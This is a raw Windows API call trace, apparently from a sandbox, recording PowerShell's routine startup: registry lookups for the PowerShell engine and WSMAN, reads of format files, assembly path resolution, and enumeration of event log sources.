	[0550.044] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0550.044] CoTaskMemAlloc (cb=0x5a) returned 0x19a370
	[0550.044] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x19a370, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0550.044] CoTaskMemFree (pv=0x19a370) 
	[0550.044] RegCloseKey (hKey=0x31c) returned 0x0
	[0550.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0550.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0550.046] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd5943d41, Data2=0x1a64, Data3=0x47a8, Data4=([0]=0x83, [1]=0xe9, [2]=0xf6, [3]=0x0, [4]=0xc0, [5]=0xf0, [6]=0x15, [7]=0xc8))) returned 0x0
	[0550.046] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xbe5d0a23, Data2=0xc069, Data3=0x466a, Data4=([0]=0xad, [1]=0x1a, [2]=0xe2, [3]=0xe5, [4]=0x99, [5]=0x15, [6]=0x3e, [7]=0x4b))) returned 0x0
	[0550.047] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0550.047] GetFileType (hFile=0x31c) returned 0x1
	[0550.047] SetErrorMode (uMode=0x1) returned 0x1
	[0550.047] GetFileType (hFile=0x31c) returned 0x1
	[0550.047] ReadFile (in: hFile=0x31c, lpBuffer=0x3a6efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a6efe8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.049] ReadFile (in: hFile=0x31c, lpBuffer=0x3a6efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a6efe8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.050] ReadFile (in: hFile=0x31c, lpBuffer=0x3a6efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a6efe8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.050] ReadFile (in: hFile=0x31c, lpBuffer=0x3a6efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a6efe8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0550.051] ReadFile (in: hFile=0x31c, lpBuffer=0x3a6efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a6efe8*, lpNumberOfBytesRead=0x24d0b8*=0xe98, lpOverlapped=0x0) returned 1
	[0550.051] ReadFile (in: hFile=0x31c, lpBuffer=0x3a6e5e8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a6e5e8*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0550.052] ReadFile (in: hFile=0x31c, lpBuffer=0x3a6efe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3a6efe8*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0550.052] CloseHandle (hObject=0x31c) returned 1
	[0550.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0550.052] SetErrorMode (uMode=0x1) returned 0x1
	[0550.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0550.052] SetErrorMode (uMode=0x1) returned 0x1
	[0550.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0550.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x31c) returned 0x0
	[0550.053] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0550.053] CoTaskMemAlloc (cb=0x5a) returned 0x19a370
	[0550.053] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x19a370, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0550.053] CoTaskMemFree (pv=0x19a370) 
	[0550.053] RegCloseKey (hKey=0x31c) returned 0x0
	[0550.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0550.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0550.056] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6862a776, Data2=0xdc68, Data3=0x41f2, Data4=([0]=0x89, [1]=0xd4, [2]=0x87, [3]=0x77, [4]=0xf2, [5]=0x3, [6]=0x16, [7]=0x80))) returned 0x0
	[0550.056] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x18f6b1e5, Data2=0xc985, Data3=0x419d, Data4=([0]=0x8c, [1]=0xb, [2]=0x75, [3]=0xfc, [4]=0xf5, [5]=0x56, [6]=0xc2, [7]=0x86))) returned 0x0
	[0551.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0551.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0551.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0551.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0551.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0551.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0551.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0551.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0557.812] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0557.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.812] CoTaskMemFree (pv=0x19bb70) 
	[0557.814] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0557.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.814] CoTaskMemFree (pv=0x19bb70) 
	[0557.815] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0557.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.815] CoTaskMemFree (pv=0x19bb70) 
	[0557.817] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0557.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.817] CoTaskMemFree (pv=0x19bb70) 
	[0557.823] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0557.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.824] CoTaskMemFree (pv=0x19bb70) 
	[0557.828] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0557.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.828] CoTaskMemFree (pv=0x19bb70) 
	[0557.829] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0557.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.829] CoTaskMemFree (pv=0x19bb70) 
	[0557.832] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d358 | out: phkResult=0x24d358*=0x31c) returned 0x0
	[0557.833] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d25c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d258, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d25c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d258*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0557.833] CoTaskMemFree (pv=0x0) 
	[0557.833] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0557.833] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x1394c0, lpcchValueName=0x24d308, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d308, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0557.833] CoTaskMemFree (pv=0x1394c0) 
	[0557.833] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0557.833] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x1394c0, lpcchValueName=0x24d308, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d308, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0557.834] CoTaskMemFree (pv=0x1394c0) 
	[0557.834] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0557.834] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x1394c0, lpcchValueName=0x24d308, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d308, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0557.834] CoTaskMemFree (pv=0x1394c0) 
	[0557.834] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d2ec, lpData=0x0, lpcbData=0x24d2e8*=0x0 | out: lpType=0x24d2ec*=0x1, lpData=0x0, lpcbData=0x24d2e8*=0x8) returned 0x0
	[0557.834] CoTaskMemAlloc (cb=0xc) returned 0x19e050
	[0557.834] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d2bc, lpData=0x19e050, lpcbData=0x24d2b8*=0x8 | out: lpType=0x24d2bc*=0x1, lpData="2.0", lpcbData=0x24d2b8*=0x8) returned 0x0
	[0557.834] CoTaskMemFree (pv=0x19e050) 
	[0561.420] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2a8 | out: phkResult=0x24d2a8*=0x31c) returned 0x0
	[0561.420] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d1ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d1ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.420] CoTaskMemFree (pv=0x0) 
	[0561.420] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.420] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x1394c0, lpcchValueName=0x24d258, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d258, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0561.420] CoTaskMemFree (pv=0x1394c0) 
	[0561.420] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.420] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x1394c0, lpcchValueName=0x24d258, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d258, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0561.420] CoTaskMemFree (pv=0x1394c0) 
	[0561.420] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.420] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x1394c0, lpcchValueName=0x24d258, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d258, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0561.420] CoTaskMemFree (pv=0x1394c0) 
	[0561.420] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d23c, lpData=0x0, lpcbData=0x24d238*=0x0 | out: lpType=0x24d23c*=0x1, lpData=0x0, lpcbData=0x24d238*=0x8) returned 0x0
	[0561.420] CoTaskMemAlloc (cb=0xc) returned 0x19def0
	[0561.420] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d20c, lpData=0x19def0, lpcbData=0x24d208*=0x8 | out: lpType=0x24d20c*=0x1, lpData="2.0", lpcbData=0x24d208*=0x8) returned 0x0
	[0561.421] CoTaskMemFree (pv=0x19def0) 
	[0561.422] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0561.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.422] CoTaskMemFree (pv=0x19bb70) 
	[0561.427] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0561.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.427] CoTaskMemFree (pv=0x19bb70) 
	[0561.433] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2d8 | out: phkResult=0x24d2d8*=0x2ec) returned 0x0
	[0561.437] RegQueryInfoKeyW (in: hKey=0x2ec, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d24c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d248, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d24c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d248*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.438] CoTaskMemFree (pv=0x0) 
	[0561.438] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.438] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x0, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.439] CoTaskMemFree (pv=0x1394c0) 
	[0561.439] CoTaskMemFree (pv=0x0) 
	[0561.439] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.439] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.439] CoTaskMemFree (pv=0x1394c0) 
	[0561.439] CoTaskMemFree (pv=0x0) 
	[0561.439] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.439] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x2, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.439] CoTaskMemFree (pv=0x1394c0) 
	[0561.439] CoTaskMemFree (pv=0x0) 
	[0561.439] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.439] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x3, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.439] CoTaskMemFree (pv=0x1394c0) 
	[0561.439] CoTaskMemFree (pv=0x0) 
	[0561.439] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.439] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x4, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.439] CoTaskMemFree (pv=0x1394c0) 
	[0561.439] CoTaskMemFree (pv=0x0) 
	[0561.439] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.439] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x5, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.439] CoTaskMemFree (pv=0x1394c0) 
	[0561.439] CoTaskMemFree (pv=0x0) 
	[0561.439] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.439] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x6, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.439] CoTaskMemFree (pv=0x1394c0) 
	[0561.439] CoTaskMemFree (pv=0x0) 
	[0561.439] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.439] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x7, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.440] CoTaskMemFree (pv=0x1394c0) 
	[0561.440] CoTaskMemFree (pv=0x0) 
	[0561.440] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0561.440] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x8, lpName=0x1394c0, lpcchName=0x24d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0561.440] CoTaskMemFree (pv=0x1394c0) 
	[0561.440] CoTaskMemFree (pv=0x0) 
	[0561.440] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x2f0) returned 0x0
	[0561.440] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
	[0561.440] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x2f4) returned 0x0
	[0561.440] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
	[0561.440] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x308) returned 0x0
	[0561.440] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
	[0561.440] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x320) returned 0x0
	[0561.440] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
	[0561.441] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x324) returned 0x0
	[0561.441] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
	[0561.441] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x328) returned 0x0
	[0561.441] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d338 | out: phkResult=0x24d338*=0x0) returned 0x2
